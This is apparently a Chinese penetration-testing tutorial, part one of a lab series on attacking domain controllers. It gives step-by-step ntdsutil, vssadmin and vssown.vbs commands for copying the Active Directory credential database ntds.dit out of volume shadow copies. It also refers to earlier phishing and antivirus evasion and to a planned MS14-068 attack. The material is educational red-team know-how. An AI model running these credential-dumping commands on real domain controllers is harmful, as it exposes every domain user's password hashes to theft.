渗透测试之地基内网篇:域森林中域控制安全(上) – 作者:dayuxiyou

系列文章

专辑:渗透测试之地基篇

简介

渗透测试-地基篇

该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。

请注意

本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。

名言:

你对这行的兴趣,决定你在这行的成就!

一、前言

渗透测试人员需谨记《网络安全法》,根据《网络安全法》所示,未经授权的渗透测试都是不合法的,不管是出于何种目的。红队渗透人员在进行渗透期间,渗透测试的行为和项目必须在被渗透方授予权限可渗透后,才可进行渗透测试操作。

如今有一家dayu公司,需要对自己的业务以及整体的内网框架体系进行隐患挖掘,授予权限我进行对dayu公司的渗透测试操作,在签署了双方的《渗透测试授权书》后,我开始了对dayu公司的渗透之旅。

跳开思维讲,我此篇内容是内网渗透篇章,通过我的专栏:

社工钓鱼 -> 免杀过全杀软 -> 内网渗透 

那么我通过了社工钓鱼的各种方式,将钓鱼文件进行免杀后,成功钓鱼到了该公司外围人员计算机,并控制了该计算机权限获得shell,并成功登录对方电脑。

通过前期对域用户大量的信息收集,画出了相对应的简单网络拓扑图,下一步需要进攻子域控制器,思路如下:

域普通用户 -> 子域控制器 -> 父域控制器 -> 辅域控制器 -> 财务独立域

通过该思路进攻即可,还有另外一条思路:

域普通用户 -> 10.10.21.0/24二级区域 -> 父子域控制器 -> 横向延伸(财务独立域10.10.21.0/24)

渗透人员最爱系统之一有kali,还有各类windows集成的武器库系统,通过上期隐藏通信隧道技术已经在内网域森林中建立了二级隧道,并在上期权限提升中将普通用户权限提升为system最高权限后,最后在上期对域森林进行横向移动后,今天我们就来对域森林中进行分析渗透域控制器能做些什么事情,总结实战中会遇到针对域控制器的各种方法,利用这些方法在内网中遨游!

不会域控制器安全的技术,就无法对内网机器进行进一步的渗透!!

二、环境介绍

目前信息收集获得的网络情况:(模拟环境)
拓扑图简介
1619505394_6087b0f236fc7b70ea1c4.png!small?1619505394582
为了更好的演示接下来的渗透和回看总拓扑图公司搭建环境情况:

单篇:渗透测试之地基内网篇:域森林中父子域和辅域用户搭建分析

在通常情况下、即使拥有管理员权限,也无法读取域控制器中的C:\Windwos\NTDS\ntds.dit文件(活动目录始终访问这个文件,所以文件被禁止读取)。使用Windows本地卷影拷贝服务可以获得文件的副本。

本节将介绍常用的提取ntds.dit文件的方法,并对非法提取ntds.dit文件、如何通过MS14-068漏洞攻击域控制器等方式方法进行演示!利用这些方法在域森林中旅行!

三、卷影拷贝服务提权

在活动目录中,所有的数据都保存在ntds.dit文件中。ntds.dit是一个二进制文件,存储位置为域控制器的%SystemRoot%ntds\ntds.dit,ntds.dit中包含(但不限于)用户名、散列值、组、GPP等与活动目录相关的信息。它和SAM文件一样,是被Windows操作系统锁定的。

我们将介绍如何从系统中导出ntds.dit,以及如何读取ntds.dit中的信息。在一般情况下,系统运维人员会利用卷影拷贝服务(Volume Shadow Copy Service,VSS)实现这些操作。VSS本质上属快照(Snapshot)技术的一种,主要用于备份和恢复(即使目标文件处于锁定状态)。

1、ntdsutil提取ntds

ntdsutil.exe是一个为活动目录提供管理机制的命令行工具。使用ntdsutil.exe,可以维护和管理活动目录数据库、控制单个主机操作、创建应用程序目录分区、删除由未使用活动目录安装向导(DCPromo.exe)成功降级的域控制器留下的元数据等。该工具默认安装在域控制器上、可以在域控制器上直接操作,也可以通过域内机器在域控制器上远程操作。ntdsutil.exe支持的操作系统有 Windows Server 2003、 Windows Server 2008、 Windows Server 2012。

1)在域控制器的命令行环境中创建一个快照

该快照包含Windows的所有文件,且在复制文件时不会受到Windows锁定机制的限制。
1619505400_6087b0f8d59d09b2440e7.png!small?1619505401171

ntdsutil snapshot "activate instance ntds" create quit quit

可以看到,创建了一个GUID为{f7f944e1-0935-4710-93ed-ec34f6bb0ff5}的快照。

2)加载创建的快照

接下来,加载刚刚创建的快照:
1619505408_6087b1002b3fbd3ab4312.png!small?1619505408504

ntdsutil snapshot "mount {f7f944e1-0935-4710-93ed-ec34f6bb0ff5}" quit quit

可看到,快照将被加载到C:\$SNAP_202104271159_VOLUMEC$\目录下!

3)复制快照中的文件
在命令行环境下输入,使用windows自带的copy命令将快照中的文件复制出来:

1619505415_6087b107ba013ce62f884.png!small?1619505416076

copy C:\$SNAP_202104271159_VOLUMEC$\Windows\NTDS\ntds.dit C:\Users\Administrator\Desktop

4)卸载之前加载的快照并删除
1619505421_6087b10d32b7614f687cb.png!small?1619505421561

ntdsutil snapshot "unmount {f7f944e1-0935-4710-93ed-ec34f6bb0ff5}" "delete {f7f944e1-0935-4710-93ed-ec34f6bb0ff5}" quit quit

完成卸载和删除,注意每次创建的快照GUID都是不相同的。

5)查询当前快照

再次查询当前系统中的所有快照,显示没有任何快照,表示删除成功:
1619505426_6087b112e7f44e290f5e3.png!small?1619505427263

ntdsutil snapshot "List All" quit quit

未删除成功继续删除即可!

2、vssadmin提取ntds

vssadminn是Windows Server 2008 & Windows 7提供的VSS管理工具,可用于创建和删除卷影拷贝、列出卷影拷贝的信息(只能管理系统 Provider创建的卷影拷贝)、显示已安装的所有卷影拷贝写入程序(writers)和提供程序(providers),以及改变卷影拷贝的存储空间(即所谓的“diff空间”)的大小等。

1)创建一个C盘的卷影拷贝
1619505432_6087b118730c2dcdf802a.png!small?1619505432857

vssadmin create shadow /for=c:

2)在创建的卷影拷贝中将ntds.dit复制出来
1619505440_6087b1204afb45e4c924c.png!small?1619505442375

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\NTDS\ntds.dit C:\Users\Administrator\Desktop\ntds.dit

可看到此时在桌面中看到ntds.dit已经被复制出来了!

3)删除快照
1619505444_6087b124a25ea70cb0fa9.png!small?1619505444936

vssadmin delete shadows /for=c: /quiet

未删除成功继续删除即可!

3、vssown.vbs提取ntds

vssown.vbs脚本的功能和vssadmin类似。vssown.vbs脚本是由Tim Tomes开发的,可用于创建和删除卷影拷贝,以及启动和停止卷影拷贝服务。可以在命令行环境中执行该脚本。
下载地址:

https://raw.githubusercontent.com/borigue/ptscripts/master/windows/vssown.vbs

1)启动卷影拷贝服务
1619505451_6087b12b098d2dc8a86f1.png!small?1619505451405

cscript vssown.vbs /start

2)创建一个C盘的卷影拷贝
1619505456_6087b1306fdbb3ad792a3.png!small?1619505456781

cscript vssown.vbs /create c

3)列出当前卷影拷贝

1619505461_6087b13508050caf22ec5.png!small?1619505461942

cscript vssown.vbs /list

可看到获得

ID:{A30D311C-20A0-4835-9CBE-7106F4226B6B}
Device object:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3

4)复制ntds.dit
1619505466_6087b13a8d9529ad51b10.png!small?1619505466931

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\windows\NTDS\ntds.dit C:\Users\Administrator\Desktop\ntds.dit

来源:freebuf.com 2021-04-27 14:36:01 by: dayuxiyou

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论